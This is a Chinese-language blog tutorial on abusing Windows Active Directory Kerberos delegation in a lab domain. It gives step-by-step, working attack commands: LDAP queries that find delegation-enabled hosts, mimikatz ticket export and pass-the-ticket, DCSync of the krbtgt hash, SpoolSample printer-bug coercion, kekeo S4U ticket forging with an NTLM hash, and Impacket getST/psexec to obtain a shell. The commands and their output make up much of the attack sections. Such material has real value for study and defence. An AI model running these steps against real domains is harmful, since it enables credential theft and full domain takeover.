基于windows中委派的攻击思路(上)-约束性委派与非约束性委派

àì夳堔傛蜴生んèń 2022-12-26 09:26 96阅读 0赞

### 文章目录 ###

*  1. 前言
 *  2. 发现具有委派关系的用户和计算机
 *   *  2.1 原理
     *  2.2 利用工具查找
     *   *  1. ADFind
         *   *  1.查询非约束委派的主机：
             *  2.查询约束委派的主机
         *  2. ldapsearch
         *   *  1. 查询非约束性委派的机器
             *  2.查询约束性委派机器
         *  3. powerview
         *   *  1.查询非约束性委派的机器
             *  2.查询约束性委派机器
 *  3.非约束性委派的利用
 *   *  3.1 原理
     *  3.2 实验过程
     *  3.3 利用思路
     *  3.4 非约束委派+Spooler打印机服务
     *   *  3.4.1 原理
         *  3.4.2 开始实验
 *  4. 约束性委派的利用
 *   *  4.1 原理
     *  4.2 实验过程
     *   *  方法1
         *  方法2
         *  方法3
 *  参考文章

# 1. 前言 #

委派是域中的一种安全设置，可以允许某个机器上的服务代表某个用户去执行某个操作，主要分为三种：

1.  非约束性委派
2.  约束性委派
3.  基于资源的约束性委派  
    这篇文章主要对这三种委派方式相关的攻击方式进行总结。  
    关于委派的其他细节理解可以参看[windows中关于委派(delegation)的理解][windows_delegation]。

# 2. 发现具有委派关系的用户和计算机 #

## 2.1 原理 ##

首先我们需要知道

1.  当服务账号或者主机被设置为`非约束性委派`时，其`userAccountControl`属性会包含`TRUSTED_FOR_DELEGATION`  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]
2.  当服务账号或者主机被设置为`约束性委派`时，其`userAccountControl`属性包含`TRUSTED_TO_AUTH_FOR_DELEGATION`，且`msDS-AllowedToDelegateTo`属性会包含被约束的服务  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

## 2.2 利用工具查找 ##

### 1. ADFind ###

`不需要账号密码即可查询`

#### 1.查询非约束委派的主机： ####

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

> 当samAccountType=805306368的时候，是对账号进行查询。  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]

#### 2.查询约束委派的主机 ####

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]

### 2. ldapsearch ###

`需要域内任意用户的账号密码`

#### 1. 查询非约束性委派的机器 ####

ldapsearch -LLL -x -H ldap://192.168.124.142:389 -D "administrator@test.com" -w "123"   -b dc=test,dc=com  "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]

#### 2.查询约束性委派机器 ####

ldapsearch -LLL -x -H ldap://192.168.124.142:389 -D "administrator@test.com" -w "123"   -b dc=test,dc=com  "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]  
ldapsearch的详细用法可看:[ldap相关知识与攻击方式][ldap]

### 3. powerview ###

#### 1.查询非约束性委派的机器 ####

`Get-NetComputer -Unconstrained -Domain test.com | select cn`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]

#### 2.查询约束性委派机器 ####

Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12]

# 3.非约束性委派的利用 #

## 3.1 原理 ##

`当某台主机访问了配置了非约束性委派当主机的时候，就会将自己当可转发当tgt发送到配置了非约束性委派当主机上。`这时候我们就萌生出一种攻击手法，诱导域管账号访问我们的被配置了非约束委派的主机，认证方式无论是kerberos还是ntlm都可以，这样子我们就拥有了域管的TGT，可以生成黄金票据。

`域控主机账户默认开启非约束委派`

我们以管理员身份通过`winrm quickconfig`可以打开普通主机上的winrm服务，而server2008之后，所有的server主机默认会开启这个服务。

当其他主机访问配置了非约束性委派主机上的winrm服务的时候，就会将`TGT与这个TGT中存储的session key`缓存到这个主机上。

> 必须有tgt跟tgt中的session key才能进行后续的kerberos认证。

这里给大家一张微软官方的图片方便大家理解：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 13]  
现在假设这么一种情形，service1配置了非约束性委派，用户A需要委派service1来访问service2。这个service1可以是主机账户。

那么非约束性委派的过程可以大概理解为：

1.  用户A向KDC申请一张可转发的用户A自己的TGT与访问service1需要的ticket。
2.  用户A将第一步得到的ticket与可转发的tgt与tgt中的session key一起发送给了service1.
3.  service1使用那张tgt与session key来代表用户A行使后续操作例如访问service2.

## 3.2 实验过程 ##

已有资产：

<table> 
 <thead> 
  <tr> 
   <th>主机名</th> 
   <th>ip</th> 
   <th>权限</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>yukong</td> 
   <td>192.168.124.142</td> 
   <td>域控</td> 
  </tr> 
  <tr> 
   <td>zhangsan</td> 
   <td>192.168.124.2</td> 
   <td>普通域内机器(配置了非约束性委派)</td> 
  </tr> 
  <tr> 
   <td>lisi</td> 
   <td>192.168.124.3</td> 
   <td>普通域内机器(配置了约束性委派)</td> 
  </tr> 
 </tbody> 
</table>

1.  首先在zhangsan的机器上开启winrm服务，开启后查看zhangsan主机上的票据，发现只有zhangsan的票据：  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 14]
2.  在yuknog主机上利用 `Enter-PSSession -ComputerName zhangsan`命令连接到zhangsan，此时域控上登陆的用户为域管administrator：  
    ![在这里插入图片描述][20201211152750769.png]  
    通过查询IP发现当前shell的IP变成了zhangsan机器的IP，可以理解成`yukong委派zhangsan代表自己在对zhangsan进行操作`。
    
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 15]
3.  登陆zhangsan机器导出域管TGT  
    使用管理员权限的shell打开mimikatz执行`sekurlsa::tickets /export`命令即可导出所有凭据，别忘记提权mimikatz，下图方框中的文件就是域管的TGT。  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 16]
4.  使用域管的凭据获得域管的权限  
    首先我们进行DCsync读取一下密码：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 17]  
发现是失败的。  
这时候我们使用刚才得到的域管的凭据：

`kerberos::ptt [0;27e615]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi`

![在这里插入图片描述][2020121115391128.png]  
发现可以访问域控机器上的C盘文件：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 18]  
读取krbtgt的hash也可以成功：  
`lsadump::dcsync /domain:test.com /user:krbtgt`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 19]

## 3.3 利用思路 ##

1.  先通过ldapsearch或者adfind或者powerview查询域内配置了非约束性委派的机器。
2.  那下目标机器权限。
3.  诱导域管对我们这台机器进行委派(通过使用钓鱼或者打印机哪个漏洞)。
4.  拿到域管的TGT
5.  over

## 3.4 非约束委派+Spooler打印机服务 ##

### 3.4.1 原理 ###

利用Windows打印系统远程协议（MS-RPRN）的一个漏洞，可以使得开启了spooler服务的主机强制对一个攻击者指定的主机进行kerberos或者NTLM认证。

### 3.4.2 开始实验 ###

1.  确定yukong主机开启spooler服务。  
    ![在这里插入图片描述][20201211162351714.png]
2.  在zhangsan上使用exp来强制yukong访问zhangsan的spooler服务，进而获得yukong主机的tgt，使用方法`spoolsample.exe yukong zhangsan`，可以强制yukong访问zhangsan。下载地址:https://github.com/shanfenglan/test/tree/master/spooler
3.  得到使用mimikatz得到域控主机账户的tgt并倒入到内存中
    
    `kerberos::ptt 1.kirbi`
4.  获取域管权限可以读取krbtgt的hash  
    `lsadump::dcsync /domain:test.com /user:krbtgt`  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 20]
    
    > 切记：一定要使用普通管理员的权限(不用绕过UAC)来执行`spoolsample.exe yukong zhangsan`这个命令，只有这样才能导出域控主机账户的tgt。

# 4. 约束性委派的利用 #

## 4.1 原理 ##

非约束性委派被委派的机器会直接得到发布委派的用户的TGT，是十分不安全的，因此微软推出了约束性委派，还扩充kerberos协议，添加了s4u2self与s4u2proxy协议，以增加安全性。这两个协议的具体细节可以查看:[windows中关于委派(delegation)的理解][windows_delegation]这篇文章。下面我简述一下约束性委派的过程，假设有这么一种情况，用户A委派service1去访问service2,那么大概的访问过程如下：

1.  用户A访问service1。
2.  service1通过s4u2self协议代表用户A去请求一个可以访问service1自身的可转发的ticket，这个ticket代表域控授权service1可以以用户A的身份进行操作。
3.  service1以用户A的身份访问KDC请求一个访问service2的可转发的ticket
4.  service1获取到ticket并以用户A的名义访问service2。

> 第一个ticket表示域控授权service1代表用户A来访问service1，第二个ticket代表域控授权service1代表用户来访问service2。总的来说s4u2self解决的问题就是，确定了某台主机可以代表某用户来对自己进行操作。s4u2proxy解决的问题是确定了某台主机可以代表某用户对其他主机进行操作。

`综上所述，对约束性委派利用对核心就是获得可转发的ticket票据。`获取根据约束性委派的执行过程可知，只要控制配置约束性委派服务的机器，并获得了它的密码，那么我们就可以劫持这台主机的kerberos请求过程，最终获得任意用户权限的ticket票据，这一行为可通过[kekeo][]完成。

## 4.2 实验过程 ##

--------------------

`补充：windows创建服务账号的方式`

> windows注册服务账户（域控才可以） setspn -u -s host/wangmazi wangmazi  
> ![在这里插入图片描述][2020122116043858.png]  
> setspn -u lisi \#可以查询lisi的spn  
> ![在这里插入图片描述][20210104102248257.png]
> 
> 如果权限不够就会报错：  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 21]  
> 创建好后就可以给账号配置约束性委派了：
> 
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 22]

--------------------

已有资产：

<table> 
 <thead> 
  <tr> 
   <th>主机名/用户</th> 
   <th>ip</th> 
   <th>权限</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>yukong</td> 
   <td>192.168.124.142</td> 
   <td>域控</td> 
  </tr> 
  <tr> 
   <td>zhangsan</td> 
   <td>192.168.124.2</td> 
   <td>普通域内机器(配置了非约束性委派)</td> 
  </tr> 
  <tr> 
   <td>lisi</td> 
   <td>192.168.124.3</td> 
   <td>普通域内机器(对zhangsan的cifs服务配置了约束性委派)</td> 
  </tr> 
 </tbody> 
</table>

--------------------

### 方法1 ###

1.  首先查询域内配置了约束性委派的服务账号。

Get-DomainUser -TrustedToAuth -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto| fl

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 23]

1.  首先我们需要申请一张lisi的tgt票据，这个票据后面可用来申请可转发的ticket  
    先通过mimikatz找到配置了约束性委派的主机的主机账户的密码hash：  
    `sekurlsa::logonpasswords`  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 24]
    
    打开kekeo,执行如下命令生成一个TGT：
    
        tgt::ask /user:lisi$ /domain:test.com /NTLM:497114015b3695d77441431ae90b78e3
2.  我们使用这张tgt来伪造请求得到一个administrator权限的ticket：
    
        tgs::s4u /tgt:2.kirbi /user:Administrator@test.com /service:cifs/zhangsan.test.com
    
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 25]
3.  将得到的ticket导入到内存：  
    打开mimikatz先privilege::Debug然后执行下面命令：
    
        kerberos::ptt 555.kirbi
4.  访问zhangsan的cifs服务看是否成功：
    
        dir \\zhangsan\c$
    
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 26]

--------------------

### 方法2 ###

也可以使用mimikatz直接导出lisi的tgt然后使用kekeo工具执行tgs::s4u:  
先使用`sekurlsa::tickets /export`导出票据，使用机器账户LISI$的票据  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 27]

tgs::s4u /tgt:[0;3e7]-2-1-40e10000-LISI$@krbtgt-TEST.COM.kirbi /user:Administrator@test.com /service:cifs/zhangsan.test.com

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 28]  
出现红框所示才算成功，这时候kekeo当前路径下会出现administrator的ticket(用于访问zhangsan的CIFS服务),导入这个tiket即可访问zhangsan的cifs服务:

*  新出现的ticket:  
    ![在这里插入图片描述][20201214165244533.png]
 *  将ticket导入内存，导入第二个名字很长的那个：  
    `kerberos::ptt 333.kirbi`  
    ![在这里插入图片描述][20201214172742187.png]

导入前访问zhangsan的c$：  
![在这里插入图片描述][20201214172637160.png]

*  导入ticket后访问zhangsan的文件共享：  
    `dir \\zhangsan.test.com\c$`  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 29]

### 方法3 ###

这种方法可以直接拿shell，但我想不通原理：

python getST.py -dc-ip 192.168.124.142 -spn cifs/zhangsan -impersonate administrator test.com/lisi$ -hash :497114015b3695d77441431ae90b78e3
    set KRB5CCNAME=administrator.ccache
    python psexec.py -no-pass -k zhangsan

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 30]

> 补充：如果实验的时候发现s4u2proxy阶段失败但是s4u2self阶段成功，且已经配置了约束性委派，那么失败的原因有可能是身份验证的方式选择了只支持kerberos验证。只要更换成“使用任何身份验证协议”即可，如下图：  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 31]

# 参考文章 #

[渗透技巧——Windows Token九种权限的利用][Windows Token]  
[By七友的文章][By]  
[Windows内网协议学习Kerberos篇之TGSREQ& TGSREP][Windows_Kerberos_TGSREQ_ TGSREP]  
[域渗透——Kerberos委派攻击][Kerberos]  
[域渗透——基于资源的约束委派利用][Link 1]  
[CVE-2019-1040利用 - 结合RCE和Domain Admin的重放漏洞][CVE-2019-1040_ - _RCE_Domain Admin]  
[微软不认的“0day”之域内本地提权-烂番茄（Rotten Tomato)][0day_-_Rotten Tomato]

--------------------

补充的一些问题：

1.  约束性委派中最终其作用的是那张可转发的TICKET，这张ticket与kerberos认证中的ticket除了可转发性其余一样吗？
    
    `一样的，本质走的都是kerberos协议。`
2.  约束性委派s4u2proxy中除了需要导入s4u2self得到的可转发的ticket外还需不需要导入被委派主机的tgt？
    
    `不需要。`

[windows_delegation]: https://shanfenglan.blog.csdn.net/article/details/108777247
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221120/cd4e1479c4af4d6fb024cd77587707a8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221120/0b835417cdc442978d1e7cc901d3fab4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221120/6d9103d1a6814e1e9372390e39936890.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221120/e5903cd664e64c31aa7231d330c10803.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221120/176279bbfe8e4e56b295a642fff64571.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]: /images/20221120/6db030de4648446f870eca37ab369a9e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]: /images/20221120/3b702adf062547f6af313089057f0133.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]: /images/20221120/c0166ecb151a4a7f9fcdd6f8c73b60b7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]: /images/20221120/18902b6c287b4a08a7f12f02aea63b65.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]: /images/20221120/ed8dc9fd326242c5972584d6df06b264.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]: /images/20221120/b3906a62669d4973a86e8b3cf5253c88.png
[ldap]: https://shanfenglan.blog.csdn.net/article/details/110792631
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]: /images/20221120/ffe7f0a6462d4367b490406a459331ef.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12]: /images/20221120/ffcd1e04443949fb8a9340e3edc36d94.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 13]: /images/20221120/a407e9c21f8b4c86af3d0ed25e601f46.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 14]: /images/20221120/039f2dafe87f4ead82407d6b0c83714e.png
[20201211152750769.png]: /images/20221120/9c319eca34fc4986a2bb370fef351d67.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 15]: /images/20221120/f9d3ba9868c0461890d9b1ff46d2266d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 16]: /images/20221120/a6ec5c61467344abb41e32a5fbe643c7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 17]: /images/20221120/3fedaf5da776428998f9f548e61d64ad.png
[2020121115391128.png]: /images/20221120/15c9ad71816e4af5a9ed3823ad442f9b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 18]: /images/20221120/2eff74ec6ce34fd3b426f273239b3620.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 19]: /images/20221120/0bb964462dd343f789d33678a34d7188.png
[20201211162351714.png]: /images/20221120/ca3c21ba996245db8cb30d487717d158.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 20]: /images/20221120/f16716ac7f26495ebf200624cdd20007.png
[kekeo]: https://github.com/gentilkiwi/kekeo/releases/tag/2.2.0-20200718
[2020122116043858.png]: /images/20221120/47303c1a27284e0fb88f60a06685e7d6.png
[20210104102248257.png]: /images/20221120/14e323dcc72147178446e1ff4693888f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 21]: /images/20221120/2ac3703e38f047039e9052a9595929c5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 22]: /images/20221120/68ad182c79dd4661a440604edd891214.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 23]: /images/20221120/5bbff0b68be84faaaa4d5cf4c71d32cd.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 24]: /images/20221120/db0aefd9cf714ab8b3f3dba59c3f0e61.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 25]: /images/20221120/2187b26357e24b5b9363ed6024176bff.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 26]: /images/20221120/b6c3d642cb5641c39891ca2ff5766e51.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 27]: /images/20221120/c48f0253be0d4fea827d8b3fd6cce874.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 28]: /images/20221120/a466faea2f764847856642a1d0bda150.png
[20201214165244533.png]: /images/20221120/f2b6aea170594ba18c698e0682ac9f71.png
[20201214172742187.png]: /images/20221120/d28eda9a6f41410384137ea63c7f18af.png
[20201214172637160.png]: /images/20221120/dc2a0d0fe98b45c78ea7ec321b9c2699.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 29]: /images/20221120/ecf3838dd5e44c4bbce0b119009e1937.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 30]: /images/20221120/de8fdbb44fb6421183f8f54382ad86d1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 31]: /images/20221120/3ce337c7f8044741b69330629cbcf9f7.png
[Windows Token]: https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows-Token%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8/
[By]: https://xz.aliyun.com/u/10492
[Windows_Kerberos_TGSREQ_ TGSREP]: https://www.anquanke.com/post/id/190625#h3-16
[Kerberos]: https://xz.aliyun.com/t/7217#toc-9
[Link 1]: https://xz.aliyun.com/t/7454
[CVE-2019-1040_ - _RCE_Domain Admin]: https://nosec.org/home/detail/2712.html
